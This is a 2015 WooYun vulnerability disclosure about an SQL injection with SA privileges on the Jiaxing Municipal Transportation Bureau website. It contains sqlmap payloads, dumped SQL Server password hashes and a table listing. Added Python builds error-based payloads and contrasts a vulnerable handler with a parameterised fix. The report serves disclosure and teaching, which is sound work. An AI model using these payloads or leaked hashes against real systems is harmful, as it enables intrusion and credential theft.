
Vulnerability Summary

Defect ID: wooyun-2015-0140913

Title: Jiaxing Municipal Transportation Bureau SQL injection vulnerability (SA privileges)

Vendor: cncert (National Internet Emergency Center)

Author: 路人甲

Submitted: 2015-09-16 21:44

Fix time: 2015-11-02 15:28

Public disclosure: 2015-11-02 15:28

Type: SQL injection

Severity: High

Self-assessed Rank: 14

Status: handed to a third-party partner organization (cncert National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2015-09-16: Details reported to the vendor; awaiting vendor handling
2015-09-18: cncert National Internet Emergency Center has not yet been able to reach the responsible unit; details disclosed only to the notifying body
2015-09-28: Details disclosed to core white hats and domain experts
2015-10-08: Details disclosed to regular white hats
2015-10-18: Details disclosed to intern white hats
2015-11-02: Details disclosed to the public

Brief description:

SQL injection in the Jiaxing Municipal Transportation Bureau website (the injected queries run with SA privileges, so getshell is possible)

Detailed description:

Injection point: http://**.**.**.**/list.aspx?id=363110810873
The application's database connection runs as sa. From there the sa password hash can be dumped directly, and with sysadmin rights on the server a shell can be obtained.

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=363110810873' AND 7920=CONVERT(INT,(CHAR(58)+CHAR(116)+CHAR(112)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (7920=7920) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(104)+CHAR(112)+CHAR(106)+CHAR(58))) AND 'WTqa'='WTqa

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id=363110810873' UNION ALL SELECT CHAR(58)+CHAR(116)+CHAR(112)+CHAR(99)+CHAR(58)+CHAR(107)+CHAR(98)+CHAR(103)+CHAR(113)+CHAR(101)+CHAR(119)+CHAR(8?)+CHAR(86)+CHAR(79)+CHAR(71)+CHAR(58)+CHAR(104)+CHAR(112)+CHAR(106)+CHAR(58)--

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=363110810873'; WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=363110810873' WAITFOR DELAY '0:0:5'--
---
[16:28:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[16:28:43] [INFO] fetching database names
[16:28:43] [INFO] the SQL query used returns 5 entries
[16:28:43] [INFO] retrieved: "cms_jtj"
[16:28:44] [INFO] retrieved: "master"
[16:28:44] [INFO] retrieved: "model"
[16:28:44] [INFO] retrieved: "msdb"
[16:28:44] [INFO] retrieved: "tempdb"
available databases [5]:
[*] cms_jtj
[*] master
[*] model
[*] msdb
[*] tempdb
current database: 'cms_jtj' 123 entries
current user: 'sa'
database management system users [3]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] sa
database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
password hash: 0x010056f48a270628975b6e65ed5fc0013ecb153f1c1706caa0b2
header: 0x0100
salt: 56f48a27
mixedcase: 0628975b6e65ed5fc0013ecb153f1c1706caa0b2
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
password hash: 0x0100202aca560ba44876cfecb8398528ba774ea24cb8252d5d80
header: 0x0100
salt: 202aca56
mixedcase: 0ba44876cfecb8398528ba774ea24cb8252d5d80
[*] sa [1]:
password hash: 0x0100aa6f5410a22fcf3369c32b0c8230ac3239d605fd8789dc49
header: 0x0100
salt: aa6f5410
mixedcase: a22fcf3369c32b0c8230ac3239d605fd8789dc49
current user is DBA: True


Screenshots: 1.png, 2.png, 3.png, 4.png
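The error-based payload above works by wrapping a subquery's result between two marker strings built from CHAR() calls (so no quote characters are needed) and forcing SQL Server to CONVERT the whole thing to INT; the conversion fails and the server's error message echoes the string, markers and leaked value included. The following is an added example, not part of the original report or of sqlmap, that decodes the page's marker expressions, rebuilds a payload of the same shape, and pulls the leaked value out of a constructed SQL Server 2008-style error message. The error text and the SYSTEM_USER subquery are assumptions for illustration.

```python
import re
from typing import Optional

# Added example. The prefix and suffix expressions below are copied from the
# error-based payload on this page; the error message further down is
# constructed, not captured from the target.
PAGE_PREFIX_EXPR = "CHAR(58)+CHAR(116)+CHAR(112)+CHAR(99)+CHAR(58)"
PAGE_SUFFIX_EXPR = "CHAR(58)+CHAR(104)+CHAR(112)+CHAR(106)+CHAR(58)"

_CHAR_RE = re.compile(r"CHAR\((\d+)\)")


def decode_char_concat(expr: str) -> str:
    """Turn a T-SQL CHAR(n)+CHAR(n)+... concatenation into the string it
    produces. Only pure CHAR() sequences are accepted."""
    out = []
    for part in (p.strip() for p in expr.split("+")):
        m = _CHAR_RE.fullmatch(part)
        if m is None:
            raise ValueError(f"not a CHAR() term: {part!r}")
        out.append(chr(int(m.group(1))))
    return "".join(out)


def encode_char_concat(s: str) -> str:
    """Inverse of decode_char_concat: the quote-free CHAR() form sqlmap
    uses so the payload never needs a literal quote character."""
    return "+".join(f"CHAR({ord(c)})" for c in s)


def error_based_payload(subquery: str, prefix: str = ":tpc:",
                        suffix: str = ":hpj:") -> str:
    """Build the CONVERT(INT, ...) trick used on this page. SQL Server tries
    to cast prefix + subquery result + suffix to INT, fails on the colons,
    and reports the offending string in the error message."""
    expr = f"{encode_char_concat(prefix)}+({subquery})+{encode_char_concat(suffix)}"
    return f"' AND 1=CONVERT(INT,({expr})) AND 'a'='a"


def extract_leaked_value(error_message: str, prefix: str = ":tpc:",
                         suffix: str = ":hpj:") -> Optional[str]:
    """Recover whatever sits between the markers in a conversion error."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix),
                  error_message, re.S)
    return m.group(1) if m else None


# Constructed SQL Server 2008-style error text (hypothetical response).
SAMPLE_ERROR = (
    "Conversion failed when converting the varchar value ':tpc:sa:hpj:' "
    "to data type int."
)

if __name__ == "__main__":
    print(decode_char_concat(PAGE_PREFIX_EXPR), decode_char_concat(PAGE_SUFFIX_EXPR))
    print(error_based_payload("SELECT SYSTEM_USER"))
    print(extract_leaked_value(SAMPLE_ERROR))
```

Decoding the two expressions gives the markers `:tpc:` and `:hpj:`; the `CASE WHEN (7920=7920) THEN CHAR(49) ELSE CHAR(48) END` in the page's payload is sqlmap's self-test, which leaks a `1` between those markers before any real data is requested.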


Proof of vulnerability:

Administrator account credentials can be obtained from the CMS tables listed below.

Database: cms_jtj
[123 tables]
+---------------------------------+
| CountTime |
| D99_Tmp |
| Zjczfs_Collect_News |
| Zjczfs_Collect_Rule |
| Zjczfs_Collect_RuleApply |
| Zjczfs_Collect_Site |
| Zjczfs_Collect_SiteFolder |
| Zjczfs_DBBak |
| Zjczfs_Form_gkyjx |
| Zjczfs_Form_zxts |
| Zjczfs_LmNews_Hit |
| Zjczfs_News_URL |
| Zjczfs_Sys_Help |
| Zjczfs_User_URL |
| Zjczfs_User_URLClass |
| Zjczfs_Vote_Score |
| Zjczfs_ads |
| Zjczfs_ads_class |
| Zjczfs_ads_stat |
| Zjczfs_adstxt |
| Zjczfs_api_commentary |
| Zjczfs_api_faviate |
| Zjczfs_api_navi |
| Zjczfs_api_pop |
| Zjczfs_api_qmenu |
| Zjczfs_customform |
| Zjczfs_customform_item |
| Zjczfs_define_class |
| Zjczfs_define_data |
| Zjczfs_define_save |
| Zjczfs_friend_class |
| Zjczfs_friend_link |
| Zjczfs_friend_pram |
| Zjczfs_mail |
| Zjczfs_news |
| Zjczfs_newsWithClass |
| Zjczfs_news_Class |
| Zjczfs_news_Gen |
| Zjczfs_news_JS |
| Zjczfs_news_JSFile |
| Zjczfs_news_JST_Class |
| Zjczfs_news_JSTemplet |
| Zjczfs_news_Mark |
| Zjczfs_news_MeiTi |
| Zjczfs_news_page |
| Zjczfs_news_site |
| Zjczfs_news_special |
| Zjczfs_news_sub |
| Zjczfs_news_topline |
| Zjczfs_news_unNews |
| Zjczfs_news_vote |
| Zjczfs_old_news |
| Zjczfs_special_news |
| Zjczfs_stat_Info |
| Zjczfs_stat_class |
| Zjczfs_stat_content |
| Zjczfs_stat_param |
| Zjczfs_sys_City |
| Zjczfs_sys_FieldClass |
| Zjczfs_sys_FieldData |
| Zjczfs_sys_Label |
| Zjczfs_sys_LabelClass |
| Zjczfs_sys_LabelFree |
| Zjczfs_sys_LabelStyle |
| Zjczfs_sys_PSF |
| Zjczfs_sys_PramUser |
| Zjczfs_sys_Pramother |
| Zjczfs_sys_Province |
| Zjczfs_sys_SiteTask |
| Zjczfs_sys_User |
| Zjczfs_sys_UserLevel |
| Zjczfs_sys_admin |
| Zjczfs_sys_admingroup |
| Zjczfs_sys_channel |
| Zjczfs_sys_channelclass |
| Zjczfs_sys_channellabel |
| Zjczfs_sys_channellabelclass |
| Zjczfs_sys_channelspecial |
| Zjczfs_sys_channelstyle |
| Zjczfs_sys_channelstyleclass |
| Zjczfs_sys_channelvalue |
| Zjczfs_sys_logs |
| Zjczfs_sys_newsIndex |
| Zjczfs_sys_param |
| Zjczfs_sys_parmConstr |
| Zjczfs_sys_parmPrint |
| Zjczfs_sys_styleclass |
| Zjczfs_sys_userfields |
| Zjczfs_sys_userother |
| Zjczfs_user_Card |
| Zjczfs_user_Constr |
| Zjczfs_user_ConstrClass |
| Zjczfs_user_Discuss |
| Zjczfs_user_DiscussActive |
| Zjczfs_user_DiscussActiveMember |
| Zjczfs_user_DiscussClass |
| Zjczfs_user_DiscussContribute |
| Zjczfs_user_DiscussMember |
| Zjczfs_user_DiscussTopic |
| Zjczfs_user_Friend |
| Zjczfs_user_FriendClass |
| Zjczfs_user_Ghistory |
| Zjczfs_user_Group |
| Zjczfs_user_Guser |
| Zjczfs_user_MessFiles |
| Zjczfs_user_Message |
| Zjczfs_user_Photo |
| Zjczfs_user_Photoalbum |
| Zjczfs_user_PhotoalbumClass |
| Zjczfs_user_Requestinformation |
| Zjczfs_user_constrPay |
| Zjczfs_user_history |
| Zjczfs_user_news |
| Zjczfs_user_note |
| Zjczfs_user_userlogs |
| Zjczfs_user_vote |
| Zjczfs_vote_Category |
| Zjczfs_vote_Item |
| Zjczfs_vote_Steps |
| Zjczfs_vote_class |
| Zjczfs_vote_manage |
| Zjczfs_vote_param |
| Zjczfs_vote_title |
+---------------------------------+


Screenshots: 5.png, 6.png, 7.png


Fix recommendation:

Validate the id parameter and pass it to the database as a bound parameter instead of concatenating it into the SQL text. Also stop running the site's database connection as sa; a least-privileged login limits what any remaining injection can reach.
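To make the fix concrete, here is an added example that is not the site's code: a stand-in for the list.aspx?id= handler, with SQLite substituting for SQL Server 2008 and Python for ASP.NET. The table names are borrowed from the dump above, the rows are made up, and the payload has the same shape as the page's 1-column UNION payload (SQLite's `||` replaces MSSQL's `+` concatenation). The vulnerable handler leaks the admin table; the hardened one rejects the payload at the allow-list and would bind the value even if it passed.

```python
import re
import sqlite3

# Added example: constructed schema and rows, not data from the target.


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE Zjczfs_news (id TEXT PRIMARY KEY, title TEXT);
        CREATE TABLE Zjczfs_sys_admin (username TEXT, password TEXT);
        INSERT INTO Zjczfs_news VALUES ('363110810873', 'Public notice');
        INSERT INTO Zjczfs_sys_admin VALUES ('admin', 'deadbeef-constructed-hash');
        """
    )
    return conn


def list_page_vulnerable(conn: sqlite3.Connection, id_param: str) -> list:
    """The bug class behind list.aspx?id=: the request value is pasted into
    the SQL text, so a quote in it closes the literal and the rest is SQL."""
    sql = f"SELECT title FROM Zjczfs_news WHERE id='{id_param}'"
    return [row[0] for row in conn.execute(sql)]


def list_page_fixed(conn: sqlite3.Connection, id_param: str) -> list:
    """Hardened handler: allow-list the shape of id, then bind it as a
    parameter so it can never be parsed as SQL. The third fix, which this
    in-memory stand-in cannot show, is connecting with a least-privileged
    login rather than sa."""
    if re.fullmatch(r"[0-9]{1,20}", id_param) is None:
        raise ValueError("id must be a decimal number")
    sql = "SELECT title FROM Zjczfs_news WHERE id=?"
    return [row[0] for row in conn.execute(sql, (id_param,))]


# Same shape as the page's 1-column UNION payload; hypothetical column names.
UNION_PAYLOAD = (
    "363110810873' UNION ALL SELECT username||':'||password "
    "FROM Zjczfs_sys_admin--"
)

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", list_page_vulnerable(db, UNION_PAYLOAD))
    try:
        list_page_fixed(db, UNION_PAYLOAD)
    except ValueError as err:
        print("fixed rejected payload:", err)
    print("fixed, legitimate id:", list_page_fixed(db, "363110810873"))
```

The allow-list alone is not the fix; it is defence in depth in front of the parameter binding. With binding in place, even an id that contains a quote is compared as data and returns no rows instead of rewriting the query.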

Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting.


Vulnerability Response

Vendor response:

Severity: Medium

Rank: 9

Confirmed: 2015-09-18 15:26

Vendor reply:

CNVD confirmed the reported situation; it has been forwarded via CNCERT to the Zhejiang branch center, which will coordinate handling with the website's administering unit.

Latest status:

None yet